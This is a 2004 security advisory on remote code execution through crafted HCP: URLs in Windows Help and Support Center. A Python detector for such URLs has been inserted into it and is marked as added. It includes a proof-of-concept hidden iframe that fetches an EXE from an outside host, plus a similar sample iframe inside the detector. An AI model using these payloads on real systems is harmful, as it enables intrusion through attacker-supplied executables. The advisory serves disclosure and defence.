[NT] Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/12/04

    To: list@securiteam.com
    Date: 12 May 2004 19:02:26 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)
    ------------------------------------------------------------------------

    SUMMARY

    "Help and Support Center (HSC) is a feature in Windows that provides help
    on a variety of topics." It can also be accessed via HCP: URLs. HSC is
    installed by default on Windows XP and Windows Server 2003 systems.

    An input validation vulnerability in HSC exposes users to remote code
    execution. An attacker could use this vulnerability to run arbitrary code
    whenever the victim opens a specially formatted HCP: URL. The user may be
    automatically directed to such a URL whenever he visits a particular web
    page. The issue can also be exploited via e-mail.

    DETAILS

    Vulnerable Systems:
     * Microsoft Windows XP and Microsoft Windows XP Service Pack 1
     * Microsoft Windows XP 64-Bit Edition Service Pack 1
     * Microsoft Windows XP 64-Bit Edition Version 2003
     * Microsoft Windows Server 2003
     * Microsoft Windows Server 2003 64-Bit Edition

    The HSC installation contains various HTML and JavaScript files, which are
    intended for HSC's internal use only. These HTML files belong to the My
    Computer Zone because they require, for example, the ability to launch
    external helper programs from JavaScript.

    By using a specially crafted URL, an attacker can cause the user's local
    machine to start helpctr.exe in the local context and pass the injected
    URL to the application. The user is then presented with the Help and
    Support DVD Upgrade dialog in Help and Support Center.

    On the Dvdupgrade page, the injected URL is linked to the "Upgrade Now"
    button. When the user presses that button, an Open/Save dialog box is
    shown for the offending (attacker-supplied) file.

    This allows an attacker to initiate the Dvdupgrade action in HSC and inject
    JavaScript code that will run in the context of these HTML files,
    specifically "HCP://system/DVDUpgrd/dvdupgrd.htm". In this way the
    attacker can run scripts in the My Computer Zone, which can, for example,
    download and start an attacker-supplied EXE program.

    As an aside, no URL activity is displayed, and Help and Support Center has
    no address bar or status bar in which the user could notice it.
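    The mechanism described above has a recognisable shape that a defender can
    look for in web content or proxy logs: an HCP: URL that reaches the HSC
    "system" pages and carries query parameters, and in particular the
    DVDUpgrd page with a "website=" value that the attacker controls. The
    following Python script is an added example, not part of the original
    advisory or of any SecuriTeam or exploitlabs code; the sample HTML, the
    host name in it and the severity levels are constructed for illustration.

```python
"""Flag HCP: URLs embedded in web content (added detection example)."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample page: one hidden iframe of the shape the advisory
# describes, one ordinary HCP: help link and one normal HTTPS link.
SAMPLE_HTML = """
<html><body>
<p>Welcome</p>
<iframe src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=evil.example/payload.exe"
        width="1" height="1"></iframe>
<a href="hcp://services/subsite?node=TopLevelBucket_2">Help link</a>
<a href="https://www.example.com/">normal link</a>
</body></html>
"""

# Matches src=/href= attributes whose value uses the hcp: scheme (any case).
HCP_URL_RE = re.compile(r'''(?:src|href)\s*=\s*["']?(hcp:[^"'\s>]+)''',
                        re.IGNORECASE)


def classify_hcp_url(url):
    """Return (severity, reason) for an HCP: URL, or None if not HCP."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "hcp":
        return None
    # "HCP://system/DVDUpgrd/dvdupgrd.htm" splits into netloc "system" and
    # path "/DVDUpgrd/dvdupgrd.htm"; join them for a case-insensitive check.
    path = (parts.netloc + parts.path).lower()
    query = parse_qs(parts.query)
    if path.endswith("system/dvdupgrd/dvdupgrd.htm") and "website" in query:
        return ("high",
                "DVDUpgrd page with externally supplied website= value: "
                + query["website"][0])
    if "system/" in path and parts.query:
        return ("medium",
                "HSC system page invoked with query parameters from web content")
    return ("low", "HCP: URL referenced from web content")


def scan_html(html):
    """Return [(url, severity, reason)] for every HCP: URL found in html."""
    findings = []
    for match in HCP_URL_RE.finditer(html):
        url = match.group(1)
        result = classify_hcp_url(url)
        if result is not None:
            findings.append((url, result[0], result[1]))
    return findings


if __name__ == "__main__":
    for url, severity, reason in scan_html(SAMPLE_HTML):
        print(severity.upper(), url, "-", reason)
```

    The same classifier can be applied to the URL field of proxy or mail
    gateway logs; any HCP: reference arriving from outside the machine is
    suspicious, since HSC content is meant only for local use.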

    Solution:
    Microsoft was contacted on March 18th, 2004. A patch has been produced to
    correct the vulnerability, and Microsoft has issued the following
    advisory:
    http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx

    Proof of Concept:
    <iframe src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc/dvdupgd/dvdupgd.exe" width="1" height="1">
    </iframe>

    http://exploitlabs.com/msnspoof/poc/
    http://exploitlabs.com/msnspoof/poc/index2.html
    http://exploitlabs.com/msnspoof/poc/index3.jpg

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:security@exploitlabs.com>
    Donnie Werner of exploitlabs.

    The original article can be found at:
    http://exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

